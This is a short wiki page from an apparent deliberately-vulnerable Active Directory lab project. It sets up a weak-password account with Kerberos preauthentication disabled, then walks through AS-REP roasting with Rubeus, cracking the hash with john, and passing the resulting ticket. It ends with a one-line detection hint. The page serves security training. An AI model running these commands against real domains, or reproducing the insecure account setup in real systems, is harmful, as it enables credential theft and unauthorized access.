ASREP Roast - benlee105/DeliberateVulnADConfig GitHub Wiki
Setting up account for ASREP Roast
- Create a User account in Active Directory, with a weak password like P@ssw0rd
- Launch Active Directory Users and Computers
- Click View > Advanced Features
- Right click user account > click Properties > click Account tab > tick "Do not require Kerberos preauthentication" > click OK
Attacking accounts via ASREP Roast
- Roast all ASREP roastable accounts using Rubeus
rubeus.exe asreproast /simple /nowrap
- Copy out hash and move to Kali:
nano asrep
Right click to paste hash
Ctrl + X > Y > Enter
john --format=krb5asrep --wordlist=<your wordlist> asrep
sample wordlists are generally in /usr/share/wordlists
- Copy password from john output, and utilize Rubeus to ask for a TGT, then pass the ticket.
rubeus.exe asktgt /user:<username> /password:<password> /ptt
- Check that ticket is successfully imported
klist
Detecting ASREP Roasting
- ASREPRoasting with will generate a 4768 event with RC4 encryption and a preauth type of 0.